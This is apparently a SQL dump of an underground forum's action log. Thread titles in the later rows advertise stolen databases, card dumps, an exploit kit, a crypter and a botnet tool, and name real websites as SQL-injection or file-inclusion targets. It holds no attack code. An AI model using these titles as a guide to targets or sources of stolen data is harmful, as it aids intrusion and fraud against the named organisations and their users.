(139, 1440496987, 1, 2, 1942, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(140, 1440496987, 1, 2, 1943, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(141, 1440496987, 1, 2, 1944, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(142, 1440496987, 1, 2, 1945, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(143, 1440496987, 1, 2, 1946, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(144, 1440496987, 1, 2, 1947, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(145, 1440496987, 1, 2, 1948, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(146, 1440496987, 1, 2, 1949, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(147, 1440496987, 1, 2, 1950, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(148, 1440496987, 1, 2, 1951, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(149, 1440496987, 1, 2, 1952, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(150, 1440496987, 1, 2, 1953, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(151, 1440496987, 1, 2, 1954, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(152, 1440496987, 1, 2, 1955, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(153, 1440496987, 1, 2, 1956, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(154, 1440496987, 1, 2, 1957, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(155, 1440496987, 1, 2, 1958, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(156, 1440496987, 1, 2, 1959, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(157, 1440496987, 1, 2, 1960, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(158, 1440496987, 1, 2, 1961, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(159, 1440496987, 1, 2, 1962, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(160, 1440496987, 1, 2, 1963, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(161, 1440496987, 1, 2, 1964, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(162, 1440496987, 1, 2, 1965, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(163, 1440496987, 1, 2, 1966, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(164, 1440496987, 1, 2, 1967, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(165, 1440496987, 1, 2, 1968, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(166, 1440496987, 1, 2, 1969, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(167, 1440496987, 1, 2, 1970, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(168, 1440496987, 1, 2, 1971, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(169, 1440496987, 1, 2, 1972, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(170, 1440496987, 1, 2, 1973, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(171, 1440496987, 1, 2, 1974, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(172, 1440496987, 1, 2, 1975, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(173, 1440496987, 1, 2, 1976, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(174, 1440496987, 1, 2, 1977, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(175, 1440496987, 1, 2, 1978, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(176, 1440496987, 1, 2, 1979, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(177, 1440496987, 1, 2, 1980, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(178, 1440496987, 1, 2, 1981, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(179, 1440496987, 1, 2, 1982, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(180, 1440496987, 1, 2, 1983, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(181, 1440496987, 1, 2, 2010, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(182, 1440496987, 1, 2, 2011, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(183, 1440496987, 1, 2, 2012, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(184, 1440496987, 1, 2, 2013, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(185, 1440496987, 1, 2, 2016, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(186, 1440496987, 1, 2, 2017, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(187, 1440496987, 1, 2, 2018, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(188, 1440496987, 1, 2, 2019, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(189, 1440496987, 1, 2, 2020, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(190, 1440496987, 1, 2, 2035, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(191, 1440496987, 1, 2, 2036, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(192, 1440496987, 1, 2, 2037, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(193, 1440496987, 1, 2, 2038, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(194, 1440496987, 1, 2, 2040, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(195, 1440496987, 1, 2, 2041, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(196, 1440496987, 1, 2, 2042, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(197, 1440496987, 1, 2, 2043, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(198, 1440496987, 1, 2, 2044, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(199, 1440496987, 1, 2, 2049, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(200, 1440496987, 1, 2, 2056, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(201, 1440496987, 1, 2, 2057, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(202, 1440496987, 1, 2, 2058, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(203, 1440496987, 1, 2, 2062, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(204, 1440496987, 1, 2, 2063, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(205, 1440496987, 1, 2, 2064, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(206, 1440496987, 1, 2, 2065, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(207, 1440496987, 1, 2, 2066, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(208, 1440496987, 1, 2, 2071, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(209, 1440496987, 1, 2, 2088, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(210, 1440496987, 1, 2, 2089, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(211, 1440496987, 1, 2, 2090, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(212, 1440496987, 1, 2, 2094, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(213, 1440496987, 1, 2, 2095, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(214, 1440496987, 1, 2, 2096, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(215, 1440496987, 1, 2, 2097, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(216, 1440496987, 1, 2, 2098, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(217, 1440496987, 1, 2, 2099, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(218, 1440496987, 1, 2, 2100, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(219, 1440496987, 1, 2, 2101, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(220, 1440496987, 1, 2, 2102, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(221, 1440496987, 1, 2, 2103, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(222, 1440496987, 1, 2, 2104, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(223, 1440496987, 1, 2, 2105, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(224, 1440496987, 1, 2, 2106, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(225, 1440496987, 1, 2, 2107, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(226, 1440496987, 1, 2, 2108, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(227, 1440496987, 1, 2, 2109, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(228, 1440496987, 1, 2, 2110, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(229, 1440496987, 1, 2, 2111, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(230, 1440496987, 1, 2, 2112, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(231, 1440496987, 1, 2, 2113, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(232, 1440496987, 1, 2, 2114, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(233, 1440496987, 1, 2, 2115, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(234, 1440496987, 1, 2, 2119, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(235, 1440496987, 1, 2, 2120, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(236, 1440496987, 1, 2, 2121, 0, 0, 0, '', 15, '\'nickname', '173.245.53.83', '', 0, 0, 0, 0, 0),
(237, 1440498404, 1, 2, 2232, 0, 0, 0, '', 15, 'test', '173.245.53.83', '', 0, 0, 0, 0, 0),
(238, 1442484947, 1, 13, 2238, 0, 0, 0, '', 10, 'w0rm.ws jabber', '141.101.104.54', '', 0, 0, 0, 0, 0),
(239, 1442484986, 1, 13, 2238, 0, 0, 0, '', 15, 'w0rm.ws jabber', '141.101.104.54', '', 0, 0, 0, 0, 0),
(240, 1442485139, 1, 13, 2239, 0, 0, 0, '', 10, '', '173.245.53.64', '', 0, 0, 0, 0, 0),
(241, 1442576439, 1, 7, 1612, 0, 0, 0, '', 22, '', '173.245.53.64', '', 0, 0, 0, 0, 0),
(242, 1442584787, 1, 2, 2242, 0, 0, 0, '', 15, 'nickname', '141.101.104.54', '', 0, 0, 0, 0, 0),
(243, 1442584787, 1, 2, 2245, 0, 0, 0, '', 15, 'test', '141.101.104.54', '', 0, 0, 0, 0, 0),
(244, 1442691739, 100, 18, 2235, 2697, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:8:\"Versus71\";}', 17, 'сломан форум monopoly.ms !', '162.158.90.112', '', 0, 0, 0, 0, 0),
(245, 1442696818, 100, 2, 2282, 0, 0, 0, '', 15, 'nickname', '162.158.90.112', '', 0, 0, 0, 0, 0),
(246, 1442696818, 100, 2, 2283, 0, 0, 0, '', 15, 'nickname', '162.158.90.112', '', 0, 0, 0, 0, 0),
(247, 1442696818, 100, 2, 2284, 0, 0, 0, '', 15, 'nickname', '162.158.90.112', '', 0, 0, 0, 0, 0),
(248, 1442696818, 100, 2, 2285, 0, 0, 0, '', 15, 'nickname', '162.158.90.112', '', 0, 0, 0, 0, 0),
(249, 1442696818, 100, 2, 2286, 0, 0, 0, '', 15, 'nickname', '162.158.90.112', '', 0, 0, 0, 0, 0),
(250, 1442696818, 100, 2, 2287, 0, 0, 0, '', 15, 'ok', '162.158.90.112', '', 0, 0, 0, 0, 0),
(251, 1442696998, 100, 2, 2281, 0, 0, 0, '', 15, '111', '162.158.90.112', '', 0, 0, 0, 0, 0),
(252, 1442697279, 100, 2, 2288, 0, 0, 0, '', 15, 'last test', '162.158.90.112', '', 0, 0, 0, 0, 0),
(253, 1442790673, 100, 7, 1862, 0, 0, 0, 'target\'s list', 29, '', '162.158.90.112', '', 0, 0, 0, 0, 0),
(254, 1442834375, 100, 2, 2311, 0, 0, 0, '', 14, '', '162.158.90.112', '', 0, 0, 0, 0, 0),
(255, 1442834375, 100, 2, 2316, 0, 0, 0, '', 14, '', '162.158.90.112', '', 0, 0, 0, 0, 0),
(256, 1442834826, 100, 7, 2237, 0, 0, 0, '', 10, 'Отработка Ваших дампов', '162.158.90.112', '', 0, 0, 0, 0, 0),
(257, 1442916333, 100, 13, 1856, 0, 0, 0, 'other', 4, 'Hunter ExploitKit', '141.101.80.172', '', 0, 0, 0, 0, 0),
(258, 1442916349, 100, 13, 2239, 0, 0, 0, 'Jabber', 29, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(259, 1442916364, 100, 13, 2239, 0, 0, 0, 'services', 4, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(260, 1442916406, 100, 13, 2234, 0, 0, 0, 'services', 4, 'Carder-club.su', '141.101.80.172', '', 0, 0, 0, 0, 0),
(261, 1442918633, 100, 15, 1835, 0, 0, 0, 'source', 4, 'polymorphic crypter', '141.101.80.172', '', 0, 0, 0, 0, 0),
(262, 1442918736, 100, 7, 2312, 0, 0, 0, 'remote', 4, '[SELLING] Smoking shop based in UK (40k entries).', '141.101.80.172', '', 0, 0, 0, 0, 0),
(263, 1442918736, 100, 7, 2313, 0, 0, 0, 'remote', 4, 'Selling Zippo.co.uk (entire DB)', '141.101.80.172', '', 0, 0, 0, 0, 0),
(264, 1442918736, 100, 7, 2314, 0, 0, 0, 'remote', 4, 'Selling SQLI in NETGEAR', '141.101.80.172', '', 0, 0, 0, 0, 0),
(265, 1442918736, 100, 7, 2315, 0, 0, 0, 'remote', 4, 'Selling FTR (court software) forum DB!', '141.101.80.172', '', 0, 0, 0, 0, 0),
(266, 1442918736, 100, 7, 2317, 0, 0, 0, 'remote', 4, 'Selling entire BOINGO DB & SQLI!', '141.101.80.172', '', 0, 0, 0, 0, 0),
(267, 1442918781, 100, 7, 2318, 0, 0, 0, 'other', 4, 'Selling SEO forum (very active)!', '141.101.80.172', '', 0, 0, 0, 0, 0),
(268, 1442918962, 100, 7, 1032, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(269, 1442918962, 100, 7, 1035, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(270, 1442918962, 100, 7, 1036, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(271, 1442918962, 100, 7, 1037, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(272, 1442918962, 100, 7, 1038, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(273, 1442918962, 100, 7, 1040, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(274, 1442918962, 100, 7, 1041, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(275, 1442918962, 100, 7, 1042, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(276, 1442918962, 100, 7, 1043, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(277, 1442918962, 100, 7, 1044, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(278, 1442918962, 100, 7, 1045, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(279, 1442918962, 100, 7, 1046, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(280, 1442918962, 100, 7, 1048, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(281, 1442918962, 100, 7, 1049, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(282, 1442918962, 100, 7, 1050, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(283, 1442918962, 100, 7, 1053, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(284, 1442918962, 100, 7, 1054, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(285, 1442918962, 100, 7, 1061, 0, 0, 0, '', 22, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(286, 1442919156, 100, 35, 2315, 0, 0, 0, 'dumps', 3, 'Selling FTR (court software) forum DB!', '141.101.80.172', '', 0, 0, 0, 0, 0),
(287, 1442919370, 100, 7, 2237, 0, 0, 0, 'services', 4, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(288, 1442919446, 100, 7, 1140, 0, 0, 0, 'services', 4, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(289, 1442919718, 1, 7, 1831, 0, 0, 0, 'remote', 4, 'Kuplu CVE-2014-6369 (will buy)', '141.101.104.54', '', 0, 0, 0, 0, 0),
(290, 1442920272, 100, 32, 2237, 0, 0, 0, '', 14, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(291, 1442920314, 100, 32, 2237, 0, 0, 0, '', 16, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(292, 1442920314, 100, 32, 2237, 0, 0, 0, 'a:3:{i:0;i:0;i:1;i:1;i:2;i:1;}', 6, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(293, 1442920331, 100, 32, 1140, 0, 0, 0, '', 15, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(294, 1442920748, 100, 32, 2237, 2700, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:4:\"w0rm\";}', 18, 'Отработка Ваших дампов', '141.101.80.172', '', 0, 0, 0, 0, 0),
(295, 1442920992, 100, 38, 1856, 2310, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:4:\"w0rm\";}', 18, 'Hunter ExploitKit', '141.101.80.172', '', 0, 0, 0, 0, 0),
(296, 1442924977, 100, 7, 2336, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(297, 1442924977, 100, 7, 2337, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(298, 1442924977, 100, 7, 2338, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(299, 1442924977, 100, 7, 2339, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(300, 1442924977, 100, 7, 2340, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(301, 1442924977, 100, 7, 2341, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(302, 1442924984, 100, 7, 2345, 0, 0, 0, '', 30, '', '141.101.80.172', '', 0, 0, 0, 0, 0),
(303, 1443201347, 100, 7, 1833, 2259, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:4:\"w0rm\";}', 18, 'ИнтересÂен Whatsapp', '141.101.80.137', '', 0, 0, 0, 0, 0),
(304, 1443898284, 100, 10, 1841, 0, 0, 0, '', 22, '', '141.101.80.137', '', 0, 0, 0, 0, 0),
(305, 1444660612, 100, 10, 1840, 0, 0, 0, '', 22, '', '141.101.80.166', '', 0, 0, 0, 0, 0),
(306, 1446218512, 100, 32, 2386, 2863, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:4:\"w0rm\";}', 18, 'Реализация кредитных карт (cvv)', '141.101.80.23', '', 0, 0, 0, 0, 0),
(307, 1446222545, 100, 7, 2397, 0, 0, 0, '', 22, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(308, 1447236695, 100, 10, 2405, 0, 0, 0, '', 15, 'Sell (dumps,ccv,fullz) 95% validity,logins,trf etc', '141.101.81.225', '', 0, 0, 0, 0, 0),
(309, 1447236695, 100, 32, 2406, 0, 0, 0, '', 15, 'Sell (dumps,ccv,fullz) 95% validity,logins,trf etc', '141.101.81.225', '', 0, 0, 0, 0, 0),
(310, 1447236695, 100, 37, 2407, 0, 0, 0, '', 15, 'Sell (dumps,ccv,fullz) 95% validity,logins,trf etc', '141.101.81.225', '', 0, 0, 0, 0, 0),
(311, 1447236695, 100, 15, 2408, 0, 0, 0, '', 15, 'Sell (dumps,ccv,fullz) 95% validity,logins,trf etc', '141.101.81.225', '', 0, 0, 0, 0, 0),
(312, 1447236695, 100, 38, 2409, 0, 0, 0, '', 15, 'Sell (dumps,ccv,fullz) 95% validity,logins,trf etc', '141.101.81.225', '', 0, 0, 0, 0, 0),
(313, 1447751900, 100, 39, 2415, 2927, 0, 0, 'продам mayhem — многоцелевой бот для *nix-серверов', 20, 'продам mayhem — многоцелевой бот для *nix-серверов', '141.101.80.23', '', 0, 0, 0, 0, 0),
(314, 1447752096, 100, 39, 2415, 2927, 0, 0, 'продам mayhem — многоцелевой бот для *nix-серверов', 20, 'продам mayhem — многоцелевой бот для *nix-серверов', '141.101.80.23', '', 0, 0, 0, 0, 0),
(315, 1447752143, 100, 39, 2415, 0, 0, 0, '', 22, 'продам mayhem — многоцелевой бот для *nix-серверов', '141.101.80.23', '', 0, 0, 0, 0, 0),
(316, 1447752167, 100, 39, 2415, 0, 0, 0, '', 21, 'продам mayhem — многоцелевой бот для *nix-серверов', '141.101.80.23', '', 0, 0, 0, 0, 0),
(317, 1447754444, 100, 39, 2415, 2927, 0, 0, 'продам mayhem — многоцелевой бот для *nix-серверов', 20, 'продам mayhem — многоцелевой бот для *nix-серверов', '141.101.80.23', '', 0, 0, 0, 0, 0),
(318, 1449040525, 100, 7, 1055, 0, 0, 0, 'remote', 4, 'waydate.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(319, 1449040525, 100, 7, 1151, 0, 0, 0, 'remote', 4, 'Sql inj - https://infraud.cc', '141.101.80.23', '', 0, 0, 0, 0, 0),
(320, 1449040525, 100, 7, 1699, 0, 0, 0, 'remote', 4, '[SQLi] www.aok.de 57mil Users', '141.101.80.23', '', 0, 0, 0, 0, 0),
(321, 1449040525, 100, 7, 1825, 0, 0, 0, 'remote', 4, '*.tomsk.ru', '141.101.80.23', '', 0, 0, 0, 0, 0),
(322, 1449040525, 100, 7, 1827, 0, 0, 0, 'remote', 4, 'mastercard', '141.101.80.23', '', 0, 0, 0, 0, 0),
(323, 1449040525, 100, 7, 1828, 0, 0, 0, 'remote', 4, '*.dlink.ru', '141.101.80.23', '', 0, 0, 0, 0, 0),
(324, 1449040525, 100, 7, 1833, 0, 0, 0, 'remote', 4, 'ИнтересÂен Whatsapp', '141.101.80.23', '', 0, 0, 0, 0, 0),
(325, 1449040525, 100, 7, 1836, 0, 0, 0, 'remote', 4, 'easyanticheat.net', '141.101.80.23', '', 0, 0, 0, 0, 0),
(326, 1449040525, 100, 7, 1837, 0, 0, 0, 'remote', 4, 'AntiCloudFlare or how to detedt real IP', '141.101.80.23', '', 0, 0, 0, 0, 0),
(327, 1449040525, 100, 7, 1850, 0, 0, 0, 'remote', 4, 'cpanels & shells', '141.101.80.23', '', 0, 0, 0, 0, 0),
(328, 1449040525, 100, 7, 1857, 0, 0, 0, 'remote', 4, 'sqlmap output', '141.101.80.23', '', 0, 0, 0, 0, 0),
(329, 1449040525, 100, 7, 1860, 0, 0, 0, 'remote', 4, 'neal-schuman.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(330, 1449040525, 100, 7, 1863, 0, 0, 0, 'remote', 4, 'lakedirectory.net', '141.101.80.23', '', 0, 0, 0, 0, 0),
(331, 1449040525, 100, 7, 1867, 0, 0, 0, 'remote', 4, 'norfolkadmirals.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(332, 1449040525, 100, 7, 2236, 0, 0, 0, 'remote', 4, 'gigabyte.com SQLi', '141.101.80.23', '', 0, 0, 0, 0, 0),
(333, 1449040525, 100, 7, 2375, 0, 0, 0, 'remote', 4, 'galaxybis.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(334, 1449040525, 100, 7, 2396, 0, 0, 0, 'remote', 4, 'univie.ac.at', '141.101.80.23', '', 0, 0, 0, 0, 0),
(335, 1449040581, 100, 7, 1175, 0, 0, 0, 'remote', 4, 'Tut.by', '141.101.80.23', '', 0, 0, 0, 0, 0),
(336, 1449040581, 100, 7, 1650, 0, 0, 0, 'remote', 4, 'rghost.ru | <marked as private> bypass', '141.101.80.23', '', 0, 0, 0, 0, 0),
(337, 1449040581, 100, 7, 1657, 0, 0, 0, 'remote', 4, 'ojooo.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(338, 1449040581, 100, 7, 1674, 0, 0, 0, 'remote', 4, 'sql sovet.ikea.ru', '141.101.80.23', '', 0, 0, 0, 0, 0),
(339, 1449040581, 100, 7, 1680, 0, 0, 0, 'remote', 4, 'onlineauction.com LFI', '141.101.80.23', '', 0, 0, 0, 0, 0),
(340, 1449040581, 100, 7, 1712, 0, 0, 0, 'remote', 4, 'old.i-teco.ru', '141.101.80.23', '', 0, 0, 0, 0, 0),
(341, 1449040581, 100, 7, 1714, 0, 0, 0, 'remote', 4, 'pz.gov.ua SQLi', '141.101.80.23', '', 0, 0, 0, 0, 0),
(342, 1449040581, 100, 7, 1723, 0, 0, 0, 'remote', 4, 'hackerstorm.co.uk SQLi', '141.101.80.23', '', 0, 0, 0, 0, 0),
(343, 1449040581, 100, 7, 1735, 0, 0, 0, 'remote', 4, '[SQLi] sgbest shop', '141.101.80.23', '', 0, 0, 0, 0, 0),
(344, 1449040714, 100, 10, 1024, 0, 0, 0, 'dumps', 4, 'wasm', '141.101.80.23', '', 0, 0, 0, 0, 0),
(345, 1449040714, 100, 10, 1030, 0, 0, 0, 'dumps', 4, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(346, 1449040714, 100, 10, 1031, 0, 0, 0, 'dumps', 4, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(347, 1449040714, 100, 10, 1034, 0, 0, 0, 'dumps', 4, 'belegit.net', '141.101.80.23', '', 0, 0, 0, 0, 0),
(348, 1449040714, 100, 10, 1092, 0, 0, 0, 'dumps', 4, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(349, 1449040714, 100, 10, 1145, 0, 0, 0, 'dumps', 4, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
